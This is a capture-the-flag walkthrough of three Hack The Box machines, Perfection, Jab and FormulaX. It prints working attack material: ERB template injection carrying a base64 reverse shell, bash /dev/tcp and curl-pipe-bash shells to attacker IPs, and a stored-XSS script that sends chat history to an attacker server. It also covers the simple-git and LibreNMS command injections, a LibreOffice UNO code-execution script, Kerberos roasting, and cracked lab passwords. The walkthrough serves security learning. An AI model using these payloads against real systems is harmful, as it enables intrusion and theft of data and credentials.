Perfection
Foothold
Connect with Kali; OpenVPN is preinstalled. Check the interfaces:
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.46 netmask 255.255.254.0 destination 10.10.14.46
inet6 fe80::fa02:de55:efc4:c711 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::102c prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 192 (192.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
A new tun0 interface has appeared, so the VPN is up. Start the machine and run a quick fscan against it:
./fscan_amd64 -h 10.10.11.253
Two ports are open, 80 and 22. Port 80 serves a grade-calculator site.
The interesting part is the input fields; these usually lead to some kind of command execution. The back-end language is not obvious at first glance, so after checking a writeup the approach is to inject a template tag into the category field that spawns a reverse shell directly:
grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40Ni84ODg4IDA%2BJjE%3D|+base64+-d+|+bash");%25>13E1
The <%= ... %> syntax looks like PHP but is actually ERB (Embedded Ruby), the template language used by Ruby web frameworks such as Rails and Sinatra, so this is server-side template injection. Two details matter. The a%0A prefix puts a newline before the tag, which is the usual way past an input check built on ^ and $, because in Ruby those anchors match at line boundaries rather than at the ends of the string. And the base64 blob decodes to bash -i >& /dev/tcp/10.10.14.46/8888 0>&1, so a listener on port 8888 must be running before the request is sent.
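To make those two details concrete, here is an added Python example (not code from the box or from any writeup) that decodes the captured POST body above, shows why a line-anchored allowlist passes the category value, and recovers the command hidden in the base64. The allowlist regex is an assumption: the page does not show the application's actual check. Python's re.MULTILINE flag reproduces Ruby's default ^/$ behaviour.

```python
import base64
import re
from urllib.parse import unquote_plus

# The POST body captured on this page (copied verbatim).
BODY = ('grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1'
        '&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0'
        '&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40Ni84ODg4'
        'IDA%2BJjE%3D|+base64+-d+|+bash");%25>13E1')


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body the way the server does."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


# Assumed allowlist: the page does not show the app's real check. Ruby's ^ and $
# always match at line boundaries; re.MULTILINE gives Python the same semantics.
WEAK = re.compile(r"^[a-zA-Z0-9 ]+$", re.MULTILINE)


def weak_ok(value: str) -> bool:
    """Line-anchored check: passes as long as the FIRST line is clean."""
    return WEAK.match(value) is not None


def strict_ok(value: str) -> bool:
    r"""Whole-string check (Ruby: \A ... \z); the newline trick fails here."""
    return re.fullmatch(r"[a-zA-Z0-9 ]+", value) is not None


def embedded_command(value: str) -> str:
    """Extract the base64 in system("echo <b64> | base64 -d | bash") and decode it."""
    m = re.search(r"echo\s+([A-Za-z0-9+/=]+)", value)
    if m is None:
        raise ValueError("no base64-wrapped command found")
    return base64.b64decode(m.group(1)).decode()
```

strict_ok is the fix: anchor the allowlist to the whole string, and better still, never concatenate user input into template source at all.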
With the shell, find the first flag:
susan@perfection:~$ cat user.txt
cat user.txt
e5396bb500041ca550313d9ea1c81a9c
Privilege escalation
Start with SUID binaries:
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/fusermount3
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/libexec/polkit-agent-helper-1
Nothing stands out. Recall that the home directory where the flag was found also contains a Migration directory:
susan@perfection:~/ruby_app$ cd ~
cd ~
susan@perfection:~$ ls
ls
linpeas.sh
Migration
ruby_app
user.txt
susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
Inside is a single database file. Copy it out and open it: the password column holds 64-character hex strings, i.e. SHA-256 hashes (hashcat mode 1400). Next, check the mail spool:
susan@perfection:~/ruby_app$ cd /var/mail
cd /var/mail
susan@perfection:/var/mail$ ls
ls
susan
cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be converted into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful student
In short: after a data breach everyone was told to change their password, and the new format is fixed: {firstname}_{firstname backwards}_{random integer between 1 and 1,000,000,000}. For susan that is susan_nasus_ followed by up to ten digits, so the only unknown is the number. Brute-force it with a hashcat mask attack:
hashcat -m 1400 susan.hash -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
Note that this mask tries exactly nine digits, which happens to be enough here. To also cover shorter numbers (and the ten-digit maximum), use a ?d?d?d?d?d?d?d?d?d?d mask with -i --increment-min 13 (the twelve literal characters plus at least one digit).
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
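An added Python example, not part of the original writeup, that turns the password policy from the mail into a hashcat mask and an entropy figure, and runs the same search in pure Python over a small range so the logic can be checked offline. The cracked hash above is not reproduced; the test target is a hash constructed from a made-up number.

```python
import hashlib
import math
from typing import Optional

MAX_INT = 1_000_000_000  # "randomly generated integer between 1 and 1,000,000,000"


def policy_password(first_name: str, n: int) -> str:
    """{firstname}_{firstname backwards}_{n}, first name lower-cased as the mail says."""
    name = first_name.lower()
    return "{0}_{1}_{2}".format(name, name[::-1], n)


def hashcat_mask(first_name: str, digits: int = 9) -> str:
    """Mask for hashcat -a 3: everything is fixed except the digits."""
    name = first_name.lower()
    return "{0}_{1}_".format(name, name[::-1]) + "?d" * digits


def policy_bits() -> float:
    """Effective entropy once the first name is known: log2 of the integer range (~29.9 bits)."""
    return math.log2(MAX_INT)


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def crack_sha256(target_hex: str, first_name: str, limit: int = MAX_INT) -> Optional[str]:
    """Pure-Python stand-in for hashcat -m 1400 -a 3: walk the integer space in order.

    limit bounds the search so a demo finishes quickly; hashcat is the tool for 10^9.
    """
    target = target_hex.lower()
    for n in range(1, limit + 1):
        candidate = policy_password(first_name, n)
        if sha256_hex(candidate) == target:
            return candidate
    return None
```

The point of policy_bits is the real lesson of this box: a "random integer up to a billion" sounds large, but once the format is known it is under 30 bits of unsalted SHA-256, which a GPU finishes in seconds.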
Then log in over SSH with it and check sudo rights:
susan@perfection:~$ sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User susan may run the following commands on perfection:
(ALL : ALL) ALL
susan can run anything with sudo, so sudo -i (or sudo cat /root/root.txt) gives the second flag in /root/root.txt.
For more on Hashcat usage see https://xz.aliyun.com/t/4008?time__1311=n4%2BxnD0DyGYQqY5i%3DDCDlhjeKeboeDRiEYxoD&alichlgref=https%3A%2F%2Fwww.google.com%2F
Jab
User
Start with an nmap scan:
nmap 10.10.11.4 --min-rate 10000
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5222/tcp open xmpp-client
5269/tcp open xmpp-server
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
445 and 139 point at SMB, so run a more detailed scan (-oA needs a basename for its three output files):
nmap -A 10.10.11.4 -oA <basename>
There is a lot of output, most of it not useful; the relevant part is below.
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-10T05:09:17
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 400.22 ms 10.10.14.1
2 418.95 ms 10.10.11.4
A Windows domain controller (host DC01, domain jab.htb) with no web service exposed. Check for known SMB vulnerabilities with nmap:
nmap -p445 --script smb-vuln* 10.10.11.4
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
pidgin
Ports 5222 and 5269 are Jabber/XMPP, a chat service; Pidgin can connect to it:
sudo apt install pidgin
After installing, running pidgin from a terminal opens the GUI; add an account there.
Under Advanced, set the connect server to the IP of jab.htb.
An XMPP Client Registration dialog appears; fill in the account name and password you just chose. In the Buddy List window choose Join a Chat -> Room List -> Find Rooms.
Clicking a room joins it, but nobody else is online and there is nothing useful there.
Pidgin can also search the server's user directory, so search jab.htb for users: back in Buddy List, go to Accounts -> your account -> Search for Users, then Search Directory in the pop-up opens the search window.
The search returns a large number of accounts. To get them out of the GUI, restart Pidgin with debug logging to a file:
sudo pidgin -d > output.log
Then extract the usernames with a regex:
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' output.log | sed 's/@jab.htb//g' | sort | uniq > outputfiltered.lst
That gives a clean username list.
Kerbrute
The other way to get usernames is to brute-force them against the KDC with Kerbrute's userenum mode. It needs a wordlist, here xato-net-10-million-usernames.txt from SecLists (the repository is large, so fetch just that file):
./kerbrute_linux_amd64 userenum --dc 10.10.11.4 -d jab.htb -t 1000 xato-net-10-million-usernames.txt
Kerbrute's -o flag writes its log to a file. If you only copied the terminal output into data.txt, a small script pulls the usernames out:
import re

# Extract usernames from kerbrute userenum output pasted into data.txt.
# Lines look like: "[+] VALID USERNAME:  jmontgomery@jab.htb"
PATTERN = re.compile(r'VALID USERNAME:\s+([^@\s]+)@')

with open("data.txt", "r", encoding="utf-8") as file:
    for line in file:
        match = PATTERN.search(line)
        if match:
            print(match.group(1))
Brute-force results depend entirely on the wordlist, and against a remote box it is slow.
AS-REP Roasting
AS-REP Roasting targets accounts with "Do not require Kerberos preauthentication" set. For such an account the KDC hands out an AS-REP without any proof of the password, and part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline. Run GetNPUsers.py over the username list:
python GetNPUsers.py jab.htb/ -usersfile /home/kali/Desktop/outputfiltered.lst -format hashcat -outputfile jabhashes.txt
If you get Errno Connection error ; Name or service not known, add the host mapping:
echo "10.10.11.4 jab.htb" | sudo tee -a /etc/hosts
Run it while you go and eat: it took me more than an hour, and three users turned out to have preauthentication disabled.
Crack the hashes offline with john or hashcat:
# John
john -w=/usr/share/wordlists/rockyou.txt jabhashes.txt
# Hashcat (mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 jabhashes.txt /usr/share/wordlists/rockyou.txt
John's output:
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121 ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:00:14 DONE (2024-03-10 06:54) 0.07017g/s 1006Kp/s 2772Kc/s 2772KC/s !)(OPPQR..*7¡Vamos!
One of the three cracked: jmontgomery / Midnight_121. Log in with this account in Pidgin, same procedure as before. The rooms now contain a conversation, roughly:
A: We need to complete the post-remediation test for last quarter's pentest. @bdavis Brian, can you give us a status?
B: Sure. We removed the SPN from the svc_openfire account; I believe that was finding #2. Can someone on the security team test it? If not, we can send it back to the pentesters for validation.
B: Here are the commands from the report; can you find someone on the security team to re-run them for validation?
B:GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
B:hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt
The pasted output of the second command already contains the cracked svc_openfire password, after the colon:
!@#$%^&*(1qazxsw
Remote access with impacket
Port 135 runs the MSRPC endpoint mapper and 593 runs RPC over HTTP, so DCOM is available too (the Distributed Component Object Model remote protocol exposes application objects over RPC).
impacket's dcomexec.py can use it to execute commands as svc_openfire:
# Example
dcomexec.py -object <DCOM Object> <domain>/<account>:'<password>'@<target IP> 'Command & payload' -silentcommand
# Actual command
dcomexec.py -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e <base64 payload>' -silentcommand
The base64 payload is a PowerShell reverse shell encoded as UTF-16LE, which is what powershell -e expects; an online generator can produce it.
After sending the payload it takes a moment before anything comes back. Once the listener shows connect to [your_ip] from (UNKNOWN) [10.10.11.4] 59624, press Enter and the shell is usable.
The first flag is in C:\Users\svc_openfire\Desktop.
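An added Python helper (not from impacket or from this writeup) that builds the encoded payload for the dcomexec.py command above, replacing the online generator: powershell -e takes base64 over the UTF-16LE encoding of the script, which is the part most often gotten wrong. The script body is a parameter; the EXAMPLE_SCRIPT below is a constructed stand-in, not a reverse shell from the page.

```python
import base64
import shlex


def encode_powershell(script: str) -> str:
    """powershell -e / -EncodedCommand expects base64 of the UTF-16LE script, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse; useful for reading -e payloads found in logs or other people's commands."""
    return base64.b64decode(blob).decode("utf-16-le")


def dcomexec_command(domain: str, user: str, password: str, target: str,
                     script: str, dcom_object: str = "MMC20") -> str:
    """Assemble the dcomexec.py line used above with the script encoded for -e.

    shlex.quote protects the password and the command from the local shell, which
    matters here because the password is made of shell metacharacters.
    """
    remote = "cmd.exe /c powershell -e " + encode_powershell(script)
    return "dcomexec.py -object {0} {1}/{2}:{3}@{4} {5} -silentcommand".format(
        dcom_object, domain, user, shlex.quote(password), target, shlex.quote(remote))


# Constructed stand-in for the reverse shell; substitute your own listener script.
EXAMPLE_SCRIPT = "Write-Output 'hello from dcom'"
```

Print dcomexec_command(...) and paste the result; the same encode_powershell output also works with -EncodedCommand on any Windows host.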
Root
Enumeration
List open ports and their services:
netstat -ano
List processes:
ps
1309 121 650564 598892 600 0 openfire-service
103 7 1316 5072 2728 0 openfire-service
Openfire is running.
Openfire's admin console has an authentication bypass (CVE-2023-32315). The console usually listens on 9090 (HTTP) and 9091 (HTTPS); neither showed up in the nmap scan, so they are only reachable from the box itself.
Port forwarding
Forward the box's 9090 and 9091 to the Kali attacker with Chisel. First get chisel.exe onto the target.
certutil.exe works like curl or wget here: start a Python HTTP server on port 8001 on Kali, then from the target (certutil lives in C:\Windows\System32 and is on PATH; write into a directory svc_openfire owns, such as Downloads) download it:
certutil.exe -urlcache -f http://10.10.16.12:8001/chisel.exe chisel.exe
Once downloaded, run it from C:\Users\svc_openfire\Downloads. The server side on Kali must be up first (./chisel server -p 8050 --reverse, with your own VPN IP in the client command); then on the target:
./chisel.exe client 10.10.15.55:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
The Openfire console is now reachable at localhost:9090 on Kali.
CVE-2023-32315
Log in with svc_openfire's credentials, which land directly in the admin console, so the authentication-bypass part of the CVE is not even needed here; the useful part is the plugin-upload code execution from the public GitHub exploit.
Upload the plugin from that project's releases, then go to Server -> Server Settings -> Management Tool and enter the password that is displayed after the upload. The Management Tool gives a command shell through the Openfire service, with which the second flag can be read.
FormulaX
Enumeration
Start with nmap:
nmap -sV -sC -Pn -T4 10.10.11.6
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-15 21:30 EDT
Nmap scan report for nunchucks.htb (10.10.11.6)
Host is up (0.40s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA)
|_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-cors: GET POST
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.51 seconds
Two ports are open, and the scan also revealed the hostname nunchucks.htb; add it to /etc/hosts before browsing.
Register an account and log in.
There is a chat bot inside; it suggests typing help, and help says history shows previous commands. Capture the traffic.
The requests show a socket.io (JavaScript) connection started from /restricted/chat.html; the relevant client source, from the browser debugger:
let value;
const res = axios.get(`/user/api/chat`);
const socket = io('/',{withCredentials: true});
//listening for the messages
socket.on('message', (my_message) => {
//console.log("Received From Server: " + my_message)
Show_messages_on_screen_of_Server(my_message)
})
const typing_chat = () => {
value = document.getElementById('user_message').value
if (value) {
// sending the messages to the server
socket.emit('client_message', value)
Show_messages_on_screen_of_Client(value);
// here we will do out socket things..
document.getElementById('user_message').value = ""
}
else {
alert("Cannot send Empty Messages");
}
}
function htmlEncode(str) {
return String(str).replace(/[^\w. ]/gi, function (c) {
return '&#' + c.charCodeAt(0) + ';';
});
}
const Show_messages_on_screen_of_Server = (value) => {
const div = document.createElement('div');
div.classList.add('container')
div.innerHTML = `
<h2>🤖 </h2>
<p>${value}</p>
`
document.getElementById('big_container').appendChild(div)
}
// send the input to the chat forum
const Show_messages_on_screen_of_Client = (value) => {
value = htmlEncode(value)
const div = document.createElement('div');
div.classList.add('container')
div.classList.add('darker')
div.innerHTML = `
<h2>🤖 </h2>
<p>${value}</p>
`
document.getElementById('big_container').appendChild(div)
}
XSS
In the code above, Show_messages_on_screen_of_Server inserts whatever the server sends straight into innerHTML without encoding; only the client-side echo goes through htmlEncode. So any server message containing HTML is executed in the browser that renders it, including messages replayed by the history command: a stored XSS. Test it.
Start a web server to catch the callback:
php -S 0.0.0.0:1234
Payload:
<img src=x onerror="document.location='http://10.10.14.12:1234/'"/>
The callback arrives, confirming the XSS. Now start two servers on the attacker, one to serve a script and one to receive exfiltrated data:
php -S 0.0.0.0:8000
php -S 0.0.0.0:4444
Serve the following as payload.js from the 8000 server. It loads socket.io from the target, sends the history command on the victim's own session and forwards every server message to port 4444:
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
const res = axios.get(`/user/api/chat`);
const socket = io('/',{withCredentials: true});
socket.on('message', (my_message) => {
fetch("http://10.10.14.12:4444/?d=" + btoa(my_message))
});
socket.emit('client_message', 'history');
});
Then send the loader through the vulnerable field:
<img src=x onerror="var script1=document.createElement('script');script1.src='http://10.10.14.12:8000/payload.js';document.head.appendChild(script1);"/>
The 4444 server receives a stream of base64-encoded messages (note that btoa throws on characters outside Latin-1, so a non-ASCII message would silently break the exfil). Decoding them reveals a new subdomain, dev-git-auto-update.chatbot.htb; add it to /etc/hosts and open it.
Small gotcha: if Burp is running and the page fails with No response received from remote server, either close Burp or see https://www.cnblogs.com/k1115h0t/p/17601709.html
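An added Python receiver, written for this page rather than taken from it, that replaces the php -S 0.0.0.0:4444 server and decodes the d= parameter as each request arrives instead of leaving the base64 to be decoded by hand. The one subtlety it handles: btoa output is placed raw in the query string, so a '+' in the base64 must not be turned into a space the way parse_qs or unquote_plus would. Port 4444 and the exfil.log file name are choices for this example.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit


def decode_exfil(path: str) -> str:
    """Recover the chat message from a request path of the form /?d=<btoa(message)>.

    btoa() output contains '+', '/' and '=' and the JS puts it into the URL as-is,
    so use unquote() rather than unquote_plus()/parse_qs(): those turn '+' into a
    space and corrupt the base64.
    """
    query = urlsplit(path).query
    for part in query.split("&"):
        key, _, val = part.partition("=")
        if key == "d":
            # btoa() encodes Latin-1 code points one byte each, so latin-1 is the inverse
            return base64.b64decode(unquote(val)).decode("latin-1")
    raise ValueError("no d= parameter in %r" % path)


class ExfilHandler(BaseHTTPRequestHandler):
    """Logs every decoded message; keeps serving when a request is malformed."""

    def do_GET(self):
        try:
            msg = decode_exfil(self.path)
        except Exception as exc:
            print("[!] could not decode %s: %s" % (self.path, exc))
        else:
            print("[+] %s" % msg)
            with open("exfil.log", "a", encoding="utf-8") as fh:
                fh.write(msg + "\n")
        self.send_response(204)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 4444), ExfilHandler).serve_forever()
```

Run it in place of the PHP server; the subdomain and anything else the bot replays shows up decoded on the terminal and in exfil.log.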
CVE-2022-25912
The page footer shows simple-git v3.14. simple-git before 3.15.0 is affected by CVE-2022-25912: the clone() target is passed to git without sanitisation, so with protocol.ext.allow=always an ext:: transport URL runs a shell command.
POC
const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
A reverse-shell one-liner does not work directly in that position, so use curl to fetch a script instead; serve it from another server on port 8001.
exp (served from 8001):
bash -i >& /dev/tcp/10.10.14.12/8888 0>&1
payload (the repository URL submitted to the application):
ext::sh -c curl% http://10.10.14.12:8001/exp|bash >&2
rlwrap nc -lvvp 8888
Privilege escalation
First check who the shell runs as; usually www-data:
whoami
List users with a login shell:
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
librenms:x:999:999::/opt/librenms:/usr/bin/bash
kai_relay:x:1001:1001:Kai Relay,,,:/home/kai_relay:/bin/bash
frank_dorky:x:1002:1002:,,,:/home/frank_dorky:/bin/bash
Check the running services:
systemctl list-units --type=service --state=running
MongoDB is running.
Look at the application's database configuration:
cat con*
import mongoose from "mongoose";
const connectDB= async(URL_DATABASE)=>{
try{
const DB_OPTIONS={
dbName : "testing"
}
mongoose.connect(URL_DATABASE,DB_OPTIONS)
console.log("Connected Successfully TO Database")
}catch(error){
console.log(`Error Connecting to the ERROR ${error}`);
}
}
List all listening sockets with their owning processes:
netstat -tunpl
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:43313 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:44489 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2002 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8082 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:162 0.0.0.0:* -
udp6 0 0 :::162 :::* -
27017 is listening locally, so open the Mongo shell and pull the data:
mongo
MongoDB shell version v4.4.29
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("2eaace3b-54ab-41a8-852b-7be3921d95fb") }
MongoDB server version: 4.4.8
show databases
admin 0.000GB
config 0.000GB
local 0.000GB
testing 0.000GB
use testing
switched to db testing
show tables
messages
users
db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTA1NjM0NDN9.xKQVFrHjQ0MyakG2QBXWduuRD9WPQfYUDnqgrChaZ0U", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
That yields two credentials:
admin:$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.
frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6
Both are bcrypt ($2b$, cost 10). Crack frank_dorky's with john:
john -w=/usr/share/wordlists/rockyou.txt frank
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:10 DONE (2024-03-16 00:57) 0.09633g/s 270.5p/s 270.5c/s 270.5C/s onlyme..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Switch user with su:
su frank_dorky
The first flag is in frank_dorky's home directory.
Lateral movement
Besides 27017 there is a service on local port 3000. Forward it out over SSH:
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.10.11.6
Password: manchesterunited
Port 3000 is LibreNMS, a PHP/MySQL/SNMP-based auto-discovering network monitoring tool that supports a wide range of network hardware and operating systems (Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP and more).
frank_dorky's password logs in, but the account has nothing useful, and the admin bcrypt hash is not going to crack. To get higher privileges in LibreNMS, work on the installation itself.
Step one: locate LibreNMS on the server:
find / -name librenms 2>/dev/null
/var/lib/mysql/librenms
/etc/logrotate.d/librenms
/opt/librenms
/opt/librenms is the installation. Listing the directory is not permitted, but files inside it can still be reached by name.
Step two: add an administrator through LibreNMS itself.
Adding an admin only requires execute permission on adduser.php:
ls -l adduser.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
Execute permission is there. adduser.php takes username, password and level; level 10 is administrator:
./adduser.php yuyulin yuyulin 10
Log in as the new admin, open the alert templates page and create a new template. Templates are rendered as Blade, so PHP can be embedded:
@php system("id>/tmp/yuyulin");@endphp
Nothing happened at first because of name resolution: the site uses librenms.com as its hostname, which does not resolve. Add it to /etc/hosts and access the site as librenms.com; then the template executes:
cat /tmp/yuyulin
uid=999(librenms) gid=999(librenms) groups=999(librenms)
Code execution confirmed, as the librenms user.
Use the same curl trick to get a reverse shell:
@php system("curl http://10.10.14.12:8001/exp|bash >&2");@endphp
As librenms, the password for kai_relay turns up in the environment (LibreNMS's .env database settings).
kai_relay's password is not only the database password; it also works for SSH:
kai_relay
mychemicalformulaX
There is also a script at /usr/bin/office.sh; look at what it does:
cat /usr/bin/office.sh
#!/bin/bash
/usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
This script starts LibreOffice Calc headless and makes it accept UNO (Universal Network Objects) remote calls on localhost port 2002, the listener seen in netstat earlier.
A UNO listener can be made to run arbitrary commands through com.sun.star.system.SystemShellExecute, so this is code execution with the privileges of the soffice process. Check with ps which user owns that process before relying on it: the listener on 2002 only helps towards root if it runs as root.
First create /tmp/shell.sh on the target (and chmod +x it) with the content:
curl http://10.10.14.12:8001/exp|bash
where exp contains the reverse-shell command:
/bin/bash -i >& /dev/tcp/10.10.14.12/4444 0>&1
Serve exp.py from the 8001 server on the attacker:
import argparse

import uno  # LibreOffice's Python UNO bridge; ships with the LibreOffice install on the target

parser = argparse.ArgumentParser(description="Run /tmp/shell.sh through a LibreOffice UNO listener")
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()

# Local UNO component context and the resolver used to reach a remote office instance
localContext = uno.getComponentContext()
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext)

# Connect to the listener started with --accept="socket,host=localhost,port=2002;urp;"
print("[+] Connecting to target...")
context = resolver.resolve(
    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))

# SystemShellExecute runs the given path with the office process's privileges;
# the third argument 1 = NO_SYSTEM_ERROR_MESSAGE (suppress error dialogs)
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("/tmp/shell.sh", '', 1)
If your script on the target has a different name, change the path in the last line.
Fetch exp.py from Kali onto the target:
curl -O http://10.10.14.12:8001/exp.py
